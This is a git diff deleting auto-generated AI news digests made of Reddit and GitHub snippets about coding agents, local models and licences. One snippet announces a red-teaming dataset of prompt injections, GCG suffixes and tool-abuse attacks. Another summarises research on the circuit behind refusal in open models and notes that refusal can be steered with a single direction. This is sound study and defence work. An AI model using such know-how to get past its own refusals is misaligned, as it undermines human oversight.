Also a lot of properties are nullable, but not explicitly. 3k warnings currently. Super tedious for a human - ---- - -## [update on my ai waifu app, can use web search react to images even picture of herself](https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances) using SerpApi for the web search the tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api) my ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag - ---- - -## [I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki](https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> If you run multiple agent CLIs daily, you've probably hit the same pain points I have: 1. Too many terminal windows — impossible to find the one you need 2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse 3. Sharing files between agents means manually copying everything into the project folder I looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b - ---- - -## [I automated most of my job](https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/) -*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I'm a software engineer with 11 yoe. 
I automated about 80% of my job with claude cli and a super simple dotnet console app. The workflow is super simple: 1. dotnet app calls our gitlab api for issues assigned to me 2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description 3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a - ---- - -## [I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it](https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.99 -Tags: api_update, cli_tool - -> Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago. So I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project. What it does fo - ---- - -## [I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out](https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.96 -Tags: open_source, cli_tool - -> Built with Claude Code, specifically for Claude Code users. Free, open source, MIT. What it does u/daik0z/claude-notify adds a Stop hook to \~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: "3 files edited · 2 commands ". 
npm install -g u/daik0z/claude-notify claude-notify setup What I learned from 374 downloads I sat down to stress-test it and foun - ---- - -## [ComfyUI workflow to fully python script?](https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 -Tags: api_update - -> Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python. Why? I'm planning to use a multi-GPU server and I want to optimize for that. What libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this? Also, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those? Thank you! - ---- - -## [Labs for Claude Certified Architect Foundations Exam](https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: tool_update - -> While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers. * Lab 01 - Customer Support Resolution Agent * Lab 02 - Code Generation Workflows * Lab 03 - Multi-Agent Research System * Lab 04 - Developer Productivity Agent * Lab 05 - CI/CD Integration * Lab 06 - Structured Data Extraction [https://github. - ---- - -## [FT - China’s Alibaba shifts towards revenue over open-source AI](https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: open_source - -> [https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t) Is it true? 
- ---- - -## [FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]](https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/) -*Reddit r/MachineLearning* | 11/04/2026 | Score: 1.00 -Tags: tool_update - -> I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch. The main goal is to make the progression across versions easier to understand from code. This is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details. - ---- - -## [I built a structured reasoning framework for Claude — because "good output" isn't enough](https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: developer_tool - -> **I built a structured reasoning framework for Claude — because "good output" isn't enough** I kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up. So I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled. The core idea: * Every complex task goes through a f - ---- - -## [Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)](https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: open_source - -> Posted here yesterday about the v1 cross-modal dataset. 
One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples. HuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal GitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/ MIT licensed. The repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and - ---- - -## [Gemma 4 - Going Mad - - - Help!!!](https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: cli_tool - -> Hi All Im getting up to speed on LLMs and we are looking at Gemma4. We are using a M3 Ultra with 512GB VRAM. So no dangers there. Im using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling. I have re-downloaded all the models this morning post the fixes. These are the unsloth ones. Im running llama.cpp - which i build on the server and is bang up to date. So in opencode CLI - if i give it this prompt - its runs - ---- - -## [Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)](https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: cli_tool - -> I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff. Tried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists. 
It includes: • local models (Ollama, Qwen, Llama etc) • free LLM APIs (OpenRouter, Groq, Gemini etc) • coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) • RAG stack tools (vector DBs, embeddings, frameworks) • agent frameworks and automati - ---- - diff --git a/data/digest-2026-04-12.md b/data/digest-2026-04-12.md deleted file mode 100644 index 00cfb87..0000000 --- a/data/digest-2026-04-12.md +++ /dev/null @@ -1,83 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-12** | 10 stories | Auto-generated from 109 archived stories - ---- - -## [JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.](https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/) -*Reddit r/ClaudeAI* | 12/04/2026 | Score: 1.00 -Tags: mcp, cli_tool, agent_tool - -> One instance is enough, but where is the fun in that right? 🤣 JARVIS across 3 servers, each running a different AI coding agent: \- Hel2: Claude Code CLI \- Hel1: Cursor CLI \- Mainframe: OpenCode They talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. Same JARVIS, different hands. They don't just run. They coordinate. Video is all 3 tmux sessions open at o - ---- - -## [Openclaw real costs: self hosting vs managed hosting vs API fees](https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/) -*Reddit r/ChatGPT* | 12/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth? 
- ---- - -## [OK I installed bitsandbytes but still getting error - Help please - thanks](https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> Used terminal and installed it like so: pip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\_main/bitsandbytes-1.33.7.preview-py3-none-win\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl) Getting error and StableDiffusion does not run File "C:\\Users\\123\\Downloads\\StabilityMatrix-win-x64\\Data\\Packages\\ - ---- - -## [Meta released new paper : Neural Computers](https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: cli_tool - -> What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\_jA?si=0h0bnM7qUsqDcKCJ paper : https://arxiv.org/abs/2604.06425 - ---- - -## [Open source agent stack that actually works in 2026 (no hype)](https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: open_source - -> been running this setup for a few months and wanted to share what actually works vs whats just github stars hermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. 
your agent on day 30 actually knows your projects and preferences everything c - ---- - -## [MiniMax M2.7 is NOT open source - DOA License :(](https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: open_source - -> Commercial use is banned without prior written permission from MiniMax. And their definition of "commercial" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting. So you can't use the model or any outputs for anything commercial! I'm really starting to hate these "open weights, closed license" models... https://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE - ---- - -## [Does LTX 2.3 have good motion transfer?](https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 0.94 -Tags: open_source - -> What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one? - ---- - -## [This is so good](https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/) -*Reddit r/ClaudeAI* | 12/04/2026 | Score: 0.86 -Tags: api_update - -> Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. 
- ---- - -## [It seems ChatGPT leaked a JSON response (including API enpoint)](https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/) -*Reddit r/ChatGPT* | 12/04/2026 | Score: 0.86 -Tags: api_update - -> idk if this is visible in network requests, but chatgpt responded with \[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\n "error": {\\n "message": "You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.",\\n "type": "images",\\n "param": nul - ---- - -## [MiniMax M2.7 Is Now Open Source](https://firethering.com/minimax-m2-7-agentic-model/) -*Hacker News* | 12/04/2026 | Score: 0.74 -Tags: open_source - ---- - diff --git a/data/digest-2026-04-14.md b/data/digest-2026-04-14.md deleted file mode 100644 index 3c0afc1..0000000 --- a/data/digest-2026-04-14.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-14** | 15 stories | Auto-generated from 271 archived stories - ---- - -## [hands on workshop: context engineering for multi agent systems [D]](https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/) -*Reddit r/MachineLearning* | 13/04/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update, agent_tool - -> hey everyone, sharing this because it's directly relevant to what a lot of people here are building. packt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman. 
what gets covered: \- semantic blueprints for multi agent orchestration \- MCP integration for standardized agent tool use \- context window management across agents \- high fidelity RAG pipelines with verifiable citations \- safeguards against prompt injection and - ---- - -## [Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)](https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/) -*Reddit r/ClaudeAI* | 14/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware) We recently added Docker Sandbox support and I wanted to share it here. The idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal. `npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje - ---- - -## [How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source](https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/) -*Reddit r/ChatGPT* | 14/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. AgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic. Each Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. 
And they're s - ---- - -## [pnpm v10.33.0 released](https://github.com/pnpm/pnpm/releases/tag/v10.33.0) -*GitHub Releases · pnpm* | 24/03/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - -> ## Minor Changes * Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070). ## Patch Changes * Fail on incompatible lockfiles in CI when - ---- - -## [Gemini CLI v0.37.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2) -*GitHub Releases · Gemini CLI* | 13/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2 - ---- - -## [Turbo v2.9.6 released](https://github.com/vercel/turborepo/releases/tag/v2.9.6) -*GitHub Releases · Turbo* | 10/04/2026 | Score: 0.92 -Tags: github_release, tool_update - -> ## What's Changed ### create-turbo * chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586 ### Examples * fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585 ### Changelog * docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul - ---- - -## [We're all building on top of something that changes under us every week, and nobody has a plan for that](https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/) 
-*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.90 -Tags: api_update, tool_update - -> I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation. Every week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g - ---- - -## [Vercel CLI vercel@51.2.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1) -*GitHub Releases · Vercel CLI* | 14/04/2026 | Score: 0.84 -Tags: api_update, cli_tool - -> ### Patch Changes - Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744)) - Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653 - ---- - -## [Gemini CLI v0.38.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0) -*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 1.00 -Tags: cli_tool - -> ## What's Changed * fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454 * Update README.md for links. 
by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759 * fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437 * feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https:// - ---- - -## [My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)](https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: api_update - -> I'm not sure if the AesSedai's Q5\_K\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. I did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. Minimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but - ---- - -## [Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)](https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385) I've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction? Main result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern. 
A mid-layer 'gate' attention head reads a detection-layer represe - ---- - -## [Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan](https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/) -*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model" [Source](https://x.com/DylanTFWang/status/2043952886166761519) The launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay. ## What HY-World 2.0 does HY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments - ---- - -## [Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.](https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: tool_update - -> Reddit r/LocalLLaMA — 9 upvotes, 14 comments - ---- - -## [2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me](https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: agent_tool - -> Hello, I've been on a quest to get something "close enough" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience. I tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now. 
So I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total - ---- - -## [Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday](https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/) -*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon) - ---- - diff --git a/data/digest-2026-04-15.md b/data/digest-2026-04-15.md deleted file mode 100644 index fd9b9a8..0000000 --- a/data/digest-2026-04-15.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-15** | 15 stories | Auto-generated from 418 archived stories - ---- - -## [Qwen Code v0.14.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5) -*GitHub Releases · Qwen Code* | 15/04/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - -> ## What's Changed * feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916 * feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232 * feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936 * feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p - ---- - -## [MCP vs API?](https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/) -*Reddit r/ClaudeAI* | 15/04/2026 | Score: 1.00 -Tags: api_update, mcp, cli_tool - -> I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. 
To me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context. I have heard a lot of people say that API is - ---- - -## [Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal](https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> Hey everyone, I built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. It just lives in your activity bar and works easily. What it does: * Runs OpenCode sessions inside a VS Code webview sidebar * Automatically uses whatever workspace folder you have open * Can auto-start a local OpenCode server when you open the sidebar * Keeps your session a - ---- - -## [Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail](https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say "task complete" 47 times but did it actually do 47 different things or did it just loop the same task over and over? I had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. 
It just kept doi - ---- - -## [[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]](https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/) -*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> TL;DR: Fine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. Model + audio samples available. \--- The Problem Chatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers - ---- - -## [Claude Code on desktop, redesigned for parallel agentic work.](https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/) -*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - -> New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. New tools make it easier to complete work without leaving the app. Integrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal. 
Plus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p - ---- - -## [I built a CLI that scans your project and auto-installs matching skills for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/) -*Reddit r/ClaudeAI* | 15/04/2026 | Score: 0.96 -Tags: developer_tool, cli_tool - -> Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow. skillgrab does this: 1. Scans \`package.json\`, \`requirements.txt\`, \`pubspec.yaml\`, \`go.mod\`, \`Dockerfile\`, \`vercel.json\`, etc. to detect your stack 2. Reads your README for non-code hints ("landing page", "pricing", "SEO") and asks if you want marketing/design/sales skills 3. Queries [skills.sh] - ---- - -## [Gemini CLI v0.38.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1) -*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1 - ---- - -## [MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?](https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/) -*Reddit r/midjourney* | 15/04/2026 | Score: 1.00 -Tags: product_launch - -> A new r/midjourney version always creates excitement. Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows: **Is it really better, or is it just new?** With MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way. 
Instead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.** The goal was sim - ---- - -## [Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.](https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: tool_update - -> I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it. ChatGPT has likely felt "nicer" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo - ---- - -## [Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details](https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: cli_tool - -> Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model. I am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples. 
